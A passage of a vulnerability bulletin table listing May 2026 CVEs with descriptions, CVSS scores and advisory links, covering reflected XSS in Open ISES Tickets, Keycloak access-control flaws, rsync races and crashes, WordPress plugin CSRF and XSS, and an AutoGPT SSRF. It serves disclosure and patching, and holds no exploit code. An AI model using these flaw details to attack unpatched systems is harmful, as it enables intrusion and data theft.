| OpenHarmony--OpenHarmony | in OpenHarmony v6.0 and prior versions allow a local attacker cause information leak. | 2026-05-19 | 5.5 | CVE-2026-27766 | https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-05.md |
| openises--tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in single_unit.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the id GET parameter directly into an HTML attribute. Attackers can craft a malicious URL containing a JavaScript payload in the id parameter that executes in the victim's browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35007 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-single-unit-php-id-parameter |
| openises--tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in single.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into an HTML attribute. Attackers can craft a malicious URL containing a JavaScript payload in the id parameter that executes in the victim's browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35008 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-single-php-ticket-id-parameter |
| openises--tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in add_note.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into a hidden input field VALUE attribute. Attackers can craft a malicious URL containing a JavaScript payload in the ticket_id parameter that executes in the victim's browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35009 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-add-note-php-ticket-id-parameter |
| openises--tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in patient_JF.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into a JavaScript variable assignment. Attackers can craft a malicious URL containing a JavaScript payload in the ticket_id parameter that executes in the victim's browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35010 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-patient-jf-php-ticket-id-parameter |
| openises--tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in opena.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_call GET parameter directly into page output. Attackers can craft a malicious URL containing a JavaScript payload in the frm_call parameter that executes in the victim's browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35011 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-opena-php-frm-call-parameter |
| openises--tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in add_facnote.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into a hidden input field VALUE attribute. Attackers can craft a malicious URL containing a JavaScript payload in the ticket_id parameter that executes in the victim's browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35012 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-add-facnote-php-ticket-id-parameter |
| openises--tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in street_view.php that allows authenticated attackers to inject arbitrary JavaScript by passing unsanitized values through the thelat and thelng GET parameters directly into JavaScript variable assignments. Attackers can craft a malicious URL containing a JavaScript payload in either parameter that executes in the victim's browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35013 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-street-view-php-thelat-and-thelng-parameters |
| openises--tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in routes_nm.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into a hidden input field VALUE attribute. Attackers can craft a malicious URL containing a JavaScript payload in the ticket_id parameter that executes in the victim's browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35014 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-routes-nm-php-ticket-id-parameter |
| openises--tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in do_unit_mail.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the the_ticket GET parameter directly into a JavaScript variable assignment. Attackers can craft a malicious URL containing a JavaScript payload in the the_ticket parameter that executes in the victim's browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35015 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-do-unit-mail-php-the-ticket-parameter |
| openises--tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in search.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_query POST parameter directly into an HTML input field VALUE attribute. Attackers can craft a malicious request containing a JavaScript payload in the frm_query parameter that executes in the victim's browser when submitted. | 2026-05-20 | 4.6 | CVE-2026-35016 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-search-php-frm-query-parameter |
| opensourcepos--Open Source Point of Sale | A vulnerability was detected in opensourcepos Open Source Point of Sale up to 3.4.2. This issue affects the function getPicThumb of the file app/Controllers/Items.php. The manipulation of the argument pic_filename results in path traversal. The attack may be launched remotely. The patch is identified as def0c27a0e252668df8d942fc31e16d1edfd7323. A patch should be applied to remediate this issue. The vendor was contacted early about this disclosure. | 2026-05-18 | 4.3 | CVE-2026-8802 | VDB-364435 | opensourcepos Open Source Point of Sale Items.php getPicThumb path traversal VDB-364435 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #802559 | opensourcepos Open Source Point of Sale 3.4.1 Path Traversal https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-xq63-3v4g-39r5 https://github.com/opensourcepos/opensourcepos/pull/4545 https://github.com/opensourcepos/opensourcepos/commit/def0c27a0e252668df8d942fc31e16d1edfd7323 |
| owencutajar--SponsorMe | The SponsorMe plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PHP_SELF Parameter in all versions up to, and including, 0.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. The PHP_SELF value is reflected in two separate locations within the vulnerable function - a form action attribute and an anchor href attribute - both of which can be exploited by appending a crafted payload to the wp-admin/admin.php URL path. | 2026-05-20 | 6.1 | CVE-2026-8626 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7df7f541-b8aa-46fa-bfca-b333beea27f9?source=cve https://plugins.trac.wordpress.org/browser/sponsorme/trunk/sponsorme.php#L440 https://plugins.trac.wordpress.org/browser/sponsorme/trunk/sponsorme.php#L475 |
| pftool--Alfie Feed Plugin | The Alfie - Feed Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.1. This is due to missing nonce validation on the alfie_manage() function which handles feed deletion via the 'delete' GET parameter. This makes it possible for unauthenticated attackers to delete arbitrary plugin feed data (from alfie_colindex, alfie_producten, alfie_reactions, and alfie_searchproduct tables) via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-22 | 4.3 | CVE-2026-4070 | https://www.wordfence.com/threat-intel/vulnerabilities/id/af36719a-8f7d-46dc-a697-cfcbb08e45e2?source=cve https://plugins.trac.wordpress.org/browser/alfie-the-productfeedtool-wp-plugin/trunk/include/alfie-manage.php#L60 https://plugins.trac.wordpress.org/browser/alfie-the-productfeedtool-wp-plugin/tags/1.2.1/include/alfie-manage.php#L60 https://plugins.trac.wordpress.org/browser/alfie-the-productfeedtool-wp-plugin/trunk/include/alfie-manage.php#L58 https://plugins.trac.wordpress.org/browser/alfie-the-productfeedtool-wp-plugin/tags/1.2.1/include/alfie-manage.php#L58 |
| PowerDNS--Authoritative | Insufficient Validation of Names During AXFR | 2026-05-21 | 6.8 | CVE-2026-42000 | https://docs.powerdns.com/authoritative/security-advisories/powerdns-advisory-powerdns-2026-06.html |
| PowerDNS--Authoritative | Concurrency and locking defects in GSS-TSIG | 2026-05-21 | 5.9 | CVE-2026-42002 | https://docs.powerdns.com/authoritative/security-advisories/powerdns-advisory-powerdns-2026-06.html |
| PowerDNS--Authoritative | Incorrect Behaviour of Views with TCP PROXY Requests | 2026-05-21 | 4.8 | CVE-2026-41999 | https://docs.powerdns.com/authoritative/security-advisories/powerdns-advisory-powerdns-2026-06.html |
| PowerDNS--Authoritative | Insufficient Validation of Member Zone Data May Cause Catalog Zone Transfer to Fail | 2026-05-21 | 4.9 | CVE-2026-42396 | https://docs.powerdns.com/authoritative/security-advisories/powerdns-advisory-powerdns-2026-06.html |
| Progress Software--MOVEit Automation | Incorrect default permissions vulnerability in Progress Software MOVEit Automation allows Retrieve Embedded Sensitive Data. This issue affects MOVEit Automation: before 2025.0.11, from 2025.1.0 before 2025.1.7. | 2026-05-20 | 6.5 | CVE-2026-8487 | https://docs.progress.com/bundle/moveit-automation-release-notes-2026/page/Fixed-Issues-2026.html |
| Progress Software--MOVEit Automation | Uncontrolled Memory Allocation vulnerability in Progress Software MOVEit Automation allows Excessive Allocation. This issue affects MOVEit Automation: before 2025.0.11, from 2025.1.0 before 2025.1.7. | 2026-05-20 | 5.9 | CVE-2026-8485 | https://docs.progress.com/bundle/moveit-automation-release-notes-2026/page/Fixed-Issues-2026.html |
| Progress Software--MOVEit Automation | Allocation of resources without limits or throttling vulnerability in Progress Software MOVEit Automation allows Flooding. This issue affects MOVEit Automation: before 2025.0.11, from 2025.1.0 before 2025.1.7. | 2026-05-20 | 5.3 | CVE-2026-8486 | https://docs.progress.com/bundle/moveit-automation-release-notes-2026/page/Fixed-Issues-2026.html |
| Progress Software--MOVEit Automation | Allocation of resources without limits or throttling vulnerability in Progress Software MOVEit Automation allows Excessive Allocation. This issue affects MOVEit Automation: before 2025.0.11, from 2025.1.0 before 2025.1.7. | 2026-05-20 | 4.3 | CVE-2026-8488 | https://docs.progress.com/bundle/moveit-automation-release-notes-2026/page/Fixed-Issues-2026.html |
| QuantumNous--new-api | A weakness has been identified in QuantumNous new-api up to 0.12.1. The impacted element is the function SearchUserTopUps/SearchAllTopUps of the file model/topup.go of the component self Endpoint. This manipulation causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 6.3 | CVE-2026-9305 | VDB-365252 | QuantumNous new-api self Endpoint topup.go SearchAllTopUps sql injection VDB-365252 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #812192 | QuantumNous new-api [Needs Manual Input] SQL Injection (CWE-89) Submit #812195 | QuantumNous new-api 0.12.1 Improper Neutralization of Data Query Logic (CWE-943) (Duplicate) https://gist.github.com/YLChen-007/cf501d0a66c81298b2f97e854f3813db |
| rdbeach--BLOGCHAT Chat System | The BLOGCHAT Chat System plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.6.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-20 | 6.1 | CVE-2026-8420 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a62186aa-19aa-445b-8fdc-b029bdafd58f?source=cve https://plugins.trac.wordpress.org/browser/blogchat-chat-system/trunk/wp-blogchat-widget.php#L208 https://plugins.trac.wordpress.org/browser/blogchat-chat-system/tags/1.3.6.3/wp-blogchat-widget.php#L208 https://plugins.trac.wordpress.org/browser/blogchat-chat-system/trunk/wp-blogchat-widget.php#L215 https://plugins.trac.wordpress.org/browser/blogchat-chat-system/tags/1.3.6.3/wp-blogchat-widget.php#L215 https://plugins.trac.wordpress.org/browser/blogchat-chat-system/trunk/wp-blogchat-widget.php#L222 https://plugins.trac.wordpress.org/browser/blogchat-chat-system/tags/1.3.6.3/wp-blogchat-widget.php#L222 https://plugins.trac.wordpress.org/browser/blogchat-chat-system/trunk/wp-blogchat-widget.php#L293 https://plugins.trac.wordpress.org/browser/blogchat-chat-system/tags/1.3.6.3/wp-blogchat-widget.php#L293 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. The cross-session verification proof is keyed only by (local userId, idpAlias) and is not bound to the upstream identity that was actually verified, so a second upstream account on the same IdP can consume it and get linked to the victim's local account. | 2026-05-20 | 6.4 | CVE-2026-9087 | https://access.redhat.com/security/cve/CVE-2026-9087 RHBZ#2480172 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. When both realm-level and client-level `notBefore` revocation policies are configured, Keycloak's OpenID Connect (OIDC) Introspection feature fails to properly honor the realm-level policy. This allows tokens that should have been revoked to remain active, potentially leading to unauthorized access or continued session validity. This could impact the security of systems utilizing Keycloak for identity and access management. | 2026-05-19 | 5.4 | CVE-2026-8922 | https://access.redhat.com/security/cve/CVE-2026-8922 RHBZ#2479586 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. An authenticated user can bypass configured WebAuthn policies during credential registration by manipulating client-side JavaScript. This occurs because the server-side processAction() fails to validate that the newly created credential's parameters, such as public key algorithms, match the realm's configured WebAuthn policies. This could lead to the creation of credentials that do not adhere to administrative security requirements, potentially weakening the overall security posture of the system by allowing non-compliant authentication methods. | 2026-05-19 | 4.3 | CVE-2026-8830 | https://access.redhat.com/security/cve/CVE-2026-8830 RHBZ#2479565 |
| Red Hat--Red Hat build of Keycloak 26.4 | A flaw was found in Keycloak. This access control vulnerability in Keycloak's OpenID Connect (OIDC) token introspection endpoint allows a confidential client to bypass audience restrictions. An attacker-controlled client with valid credentials can retrieve sensitive token claims intended for other resource servers, compromising the confidentiality of lightweight access tokens. This issue can be exploited remotely by any confidential client in the realm with valid credentials. | 2026-05-19 | 6.5 | CVE-2026-37979 | RHSA-2026:19596 RHSA-2026:19597 https://access.redhat.com/security/cve/CVE-2026-37979 RHBZ#2455328 |
| Red Hat--Red Hat build of Keycloak 26.4 | A flaw was found in Keycloak. This authentication vulnerability allows a remote attacker to replay `ExecuteActionsActionToken` tokens within Keycloak's WebAuthn (Web Authentication) flow. By intercepting an execute-actions email link, an attacker can register their own authenticator to a victim's account. This leads to unauthorized enrollment of a hardware-backed credential, enabling persistent account takeover. | 2026-05-19 | 6.8 | CVE-2026-37982 | RHSA-2026:19596 RHSA-2026:19597 https://access.redhat.com/security/cve/CVE-2026-37982 RHBZ#2455329 |
| Red Hat--Red Hat build of Keycloak 26.4 | A flaw was found in Keycloak. An authenticated client could exploit an Insecure Direct Object Reference (IDOR) vulnerability in the Authorization Services Protection API endpoint. By knowing or obtaining a resource's unique identifier (UUID) belonging to another Resource Server within the same realm, the client could bypass authorization checks. This allows the client to perform unauthorized GET, PUT, and DELETE operations on resources, leading to information disclosure and potential unauthorized modification or deletion of data. | 2026-05-19 | 6.8 | CVE-2026-4630 | RHSA-2026:19596 RHSA-2026:19597 https://access.redhat.com/security/cve/CVE-2026-4630 RHBZ#2450245 |
| Red Hat--Red Hat build of Keycloak 26.4 | A flaw was found in Keycloak. A low-privilege administrator with the 'view-clients' role can exploit this by invoking the 'evaluate-scopes' Admin API endpoints with an arbitrary user ID (userId) parameter. This vulnerability allows for cross-role personally identifiable information (PII) leakage, enabling unauthorized visibility into user identities and authorizations across the realm. Exploitation is possible remotely via network access to the Admin API. | 2026-05-19 | 4.9 | CVE-2026-37978 | RHSA-2026:19596 RHSA-2026:19597 https://access.redhat.com/security/cve/CVE-2026-37978 RHBZ#2455327 |
| Red Hat--Red Hat build of Keycloak 26.4 | A flaw was found in Keycloak. A broken access control vulnerability in the Account Resources user lookup endpoint allows a remote authenticated user, who owns at least one User-Managed Access (UMA) resource, to enumerate and harvest personally identifiable information (PII) for all realm users. By sending crafted requests with arbitrary usernames or email values, the endpoint returns full profile objects for unrelated users. This leads to broad profile-level information disclosure. | 2026-05-19 | 4.3 | CVE-2026-37981 | RHSA-2026:19596 RHSA-2026:19597 https://access.redhat.com/security/cve/CVE-2026-37981 RHBZ#2455326 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in libsolv. This heap buffer overflow vulnerability occurs when a victim processes a specially crafted `.solv` file containing negative size values in the `repo_add_solv` function. This leads to an undersized memory allocation and a subsequent out-of-bounds write. An attacker could exploit this to cause a denial of service (DoS). | 2026-05-20 | 6.5 | CVE-2026-9149 | https://access.redhat.com/security/cve/CVE-2026-9149 RHBZ#2460380 https://github.com/openSUSE/libsolv/pull/617 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in libsolv. This stack-based buffer overflow vulnerability occurs in libsolv's Debian metadata parser when processing specially crafted Debian repository metadata. An attacker could exploit this by providing malicious SHA384 or SHA512 checksum tags, leading to memory corruption and a denial of service (DoS) in the affected system. | 2026-05-20 | 6.5 | CVE-2026-9150 | https://access.redhat.com/security/cve/CVE-2026-9150 RHBZ#2460379 https://github.com/openSUSE/libsolv/pull/616 |
| registrationformbuilder--Vedrixa Forms User Registration Form, Signup Form & Drag & Drop Form Builder | The Vedrixa Forms - User Registration Form, Signup Form & Drag & Drop Form Builder plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.1.1. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to overwrite the structure of any form - adding, removing, or altering fields - by writing attacker-controlled data to the plugin's FORMS database table. The 'ajax-nonce' nonce used by this handler is injected into the public frontend via wp_localize_script(), so any authenticated user who visits a page containing a form shortcode can obtain it without any elevated access. | 2026-05-22 | 4.3 | CVE-2026-8692 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1b3b8a6c-1c84-4abe-ad4a-02302b04987b?source=cve https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.1.1/admin/class-registration-form-builder-admin.php#L866 https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.1.1/includes/class-registration-form-builder.php#L174 https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.1.1/public/class-registration-form-builder-public.php#L121 https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.0.0/admin/class-registration-form-builder-admin.php#L866 https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.0.0/includes/class-registration-form-builder.php#L174 https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.0.0/public/class-registration-form-builder-public.php#L121 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3540543%40vedrixa-forms-registration-builder&new=3540543%40vedrixa-forms-registration-builder&sfp_email=&sfph_mail= |
| Revolution Slider--Slider Revolution | The Slider Revolution plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 7.0.9 via the 'get_stream_data()' function. This makes it possible for unauthenticated attackers to extract sensitive data including published password-protected post, page, and product content. | 2026-05-20 | 5.3 | CVE-2026-6728 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3cd7be2c-9ba9-4d25-8907-610898df5834?source=cve https://www.sliderrevolution.com/changelog/ |
| RsyncProject--rsync | Rsync version 3.4.2 and prior contain symlink race condition vulnerabilities in path-based system calls including chmod, lchown, utimes, rename, unlink, mkdir, symlink, mknod, link, rmdir, and lstat that allow local attackers to redirect operations to files outside the exported rsync module. Attackers with local filesystem access can exploit the timing window between path resolution and syscall execution by swapping symlinks to apply sender-supplied permissions, ownership, timestamps, or filenames to arbitrary files outside the intended module boundary on rsync daemons configured with 'use chroot = no'. | 2026-05-20 | 6.3 | CVE-2026-43619 | https://github.com/RsyncProject/rsync/security/advisories/GHSA-4h9m-w5ff-j735 https://github.com/RsyncProject/rsync/releases/tag/v3.4.3 https://www.vulncheck.com/advisories/rsync-symlink-race-condition-via-path-based-syscalls |
| RsyncProject--rsync | Rsync version 3.4.2 and prior contain a receiver-side out-of-bounds array read vulnerability in recv_files() in receiver.c that allows a malicious rsync server to crash the rsync client process. Attackers can exploit the vulnerability by setting CF_INC_RECURSE in compatibility flags and sending a specially crafted file list where the first sorted entry is not the leading dot directory, followed by a transfer record with ndx=0 and an iflag word without ITEM_TRANSFER, causing the receiver to read 8 bytes before the allocated pointer array and dereference an invalid pointer at an unmapped address, resulting in a deterministic SIGSEGV crash of the rsync client. | 2026-05-20 | 6.5 | CVE-2026-43620 | https://github.com/RsyncProject/rsync/security/advisories/GHSA-28pw-r563-rxvm https://github.com/RsyncProject/rsync/releases/tag/v3.4.3 https://www.vulncheck.com/advisories/rsync-out-of-bounds-array-read-via-recv-files |
| RsyncProject--rsync | Rsync version 3.4.2 and prior contain an authorization bypass vulnerability in the rsync daemon's hostname-based access control list enforcement when configured with chroot. Attackers can bypass hostname-based deny rules by controlling the PTR record for their source IP address, allowing connections from hostnames that administrators intended to deny when reverse DNS resolution fails and defaults to UNKNOWN. | 2026-05-20 | 4.8 | CVE-2026-43617 | https://github.com/RsyncProject/rsync/security/advisories/GHSA-rjfm-3w2m-jf4f https://github.com/RsyncProject/rsync/releases/tag/v3.4.3 https://www.vulncheck.com/advisories/rsync-authorization-bypass-via-hostname-resolution |
| Samsung Open Source--Escargot | Uncontrolled Recursion vulnerability in Samsung Open Source Escargot allows Oversized Serialized Data Payloads. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 5.5 | CVE-2026-47309 | https://github.com/Samsung/escargot/pull/1565 |
| Samsung Open Source--Escargot | Release of invalid pointer or reference vulnerability in Samsung Open Source Escargot allows Buffer Manipulation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 5.5 | CVE-2026-47312 | https://github.com/Samsung/escargot/pull/1565 |
| Samsung Open Source--Escargot | Memory allocation with excessive size value vulnerability in Samsung Open Source Escargot allows Excessive Allocation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 5.5 | CVE-2026-47313 | https://github.com/Samsung/escargot/pull/1565 |
| Samsung Open Source--Escargot | Improper Check for Unusual or Exceptional Conditions vulnerability in Samsung Open Source Escargot allows Input Data Manipulation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 5.5 | CVE-2026-47315 | https://github.com/Samsung/escargot/pull/1565 |
| Samsung Open Source--Escargot | Improper Check or Handling of Exceptional Conditions vulnerability in Samsung Open Source Escargot allows Input Data Manipulation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 5.5 | CVE-2026-47316 | https://github.com/Samsung/escargot/pull/1565 |
| Samsung Open Source--Escargot | Uncontrolled Recursion vulnerability in Samsung Open Source Escargot allows Excessive Allocation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 5.5 | CVE-2026-47317 | https://github.com/Samsung/escargot/pull/1565 |
| Samsung Open Source--Walrus | NULL pointer dereference vulnerability in Samsung Open Source Walrus allows an attacker to cause a denial of service via a crafted WebAssembly module containing deeply nested instructions. This issue affects Walrus: f339b8ee4ea701772e8ae640b3d1b12ac02b1ae9. | 2026-05-19 | 5.5 | CVE-2026-47307 | https://github.com/Samsung/walrus/pull/409 |
| Samsung Open Source--Walrus | NULL pointer dereference vulnerability in Samsung Open Source Walrus allows Pointer Manipulation. This issue affects Walrus: f339b8ee4ea701772e8ae640b3d1b12ac02b1ae9. | 2026-05-19 | 5.5 | CVE-2026-47308 | https://github.com/Samsung/walrus/pull/409 |
| shapedplugin--Location Weather WordPress Weather Forecast, AQI, Temperature and Weather Widget | The Location Weather plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on the `splw_update_block_options()` and `lwp_clean_weather_transients()` functions in all versions up to, and including, 3.0.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to disable all weather blocks and purge all weather cache transients. The nonce required for these actions is exposed to all authenticated users via `wp_localize_script()` on the `init` hook. | 2026-05-22 | 4.3 | CVE-2026-7249 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d472011d-1623-4791-9d56-715d90fe0469?source=cve https://plugins.trac.wordpress.org/browser/location-weather/tags/3.0.2/includes/Admin/AdminDashboard/Splw_Blocks_Page_Wrapper.php#L256 https://plugins.trac.wordpress.org/browser/location-weather/tags/3.0.2/includes/Admin/AdminDashboard/Splw_Blocks_Page_Wrapper.php#L331 https://wordpress.org/plugins/location-weather/ https://plugins.trac.wordpress.org/browser/location-weather/tags/3.0.3/includes/Admin/AdminDashboard/Splw_Blocks_Page_Wrapper.php#L256 https://plugins.trac.wordpress.org/browser/location-weather/tags/3.0.3/includes/Admin/AdminDashboard/Splw_Blocks_Page_Wrapper.php#L332 |
| Significant-Gravitas--AutoGPT | AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. In versions 0.1.0 through 0.6.51, SendEmailBlock in autogpt_platform/backend/backend/blocks/email_block.py accepts a user-supplied smtp_server (string) and smtp_port (integer) as per-execution block inputs, then passes them directly to Python's smtplib.SMTP() to open a raw TCP connection with no IP address validation. This completely bypasses the platform's hardened SSRF protections in backend/util/request.py - the validate_url_host() function and BLOCKED_IP_NETWORKS blocklist that every other block uses to block connections to private, loopback, link-local, and cloud metadata addresses. An authenticated user on a shared AutoGPT deployment can use this to perform non-blind internal network port scanning and service fingerprinting: smtplib reads the target's TCP banner on connect and embeds it in the exception message, which is persisted as user-visible block output via the execution framework. This issue has been fixed in version 0.6.52. | 2026-05-19 | 5 | CVE-2026-33234 | https://github.com/Significant-Gravitas/AutoGPT/security/advisories/GHSA-4jwj-6mg5-wrwf https://github.com/Significant-Gravitas/AutoGPT/releases/tag/autogpt-platform-beta-v0.6.52 |
| simonholliday--Anomify AI Anomaly Detection and Alerting | The Anomify AI - Anomaly Detection and Alerting plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'anomify_api_key' parameter in versions up to and including 0.3.6. This is due to insufficient input sanitization and missing output escaping: the plugin applies sanitize_text_field() to the Metric Data Key input before saving it via update_option(), but sanitize_text_field() strips HTML tags without encoding double-quote characters, and the value is then echoed directly into an HTML attribute context (value="...") without esc_attr(). This makes it possible for authenticated attackers with administrator-level access to inject arbitrary web scripts that execute whenever a user visits the plugin's settings page. | 2026-05-20 | 4.4 | CVE-2026-6404 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4036057c-0c43-4d9c-97db-4861d91a4daa?source=cve https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Wp/includes/admin_options.php#L43 https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Wp/includes/admin_options.php#L43 https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Wp/Admin.php#L32 https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Wp/Admin.php#L32 https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Config.php#L152 https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Config.php#L152 |
| simonholliday--Anomify AI Anomaly Detection and Alerting | The Anomify AI - Anomaly Detection and Alerting plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) leading to Stored Cross-Site Scripting (XSS) in versions up to and including 0.3.6. This is due to missing nonce verification on the settings page handler and insufficient output escaping in the admin_options.php template. The settings form includes no wp_nonce_field() and the handler performs no check_admin_referer() check, meaning any cross-origin POST can modify plugin settings. The API key field is sanitized only with sanitize_text_field(), which strips HTML tags but does not encode double-quote characters; the value is then rendered into an HTML attribute via bare echo without esc_attr(), allowing a double-quote attribute-escape payload to survive both sanitization and storage. This makes it possible for unauthenticated attackers to inject arbitrary web scripts by tricking a logged-in administrator into visiting a malicious page that submits a forged request, storing the payload in the database and causing it to execute in the administrator's browser whenever the plugin settings page is visited. | 2026-05-20 | 4.3 | CVE-2026-6405 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a1e02c2d-a38a-495c-9c37-098049297be2?source=cve https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Wp/includes/admin_options.php#L43 https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Wp/includes/admin_options.php#L43 https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Wp/Admin.php#L31 https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Wp/Admin.php#L31 https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Config.php#L152 https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Config.php#L152 |
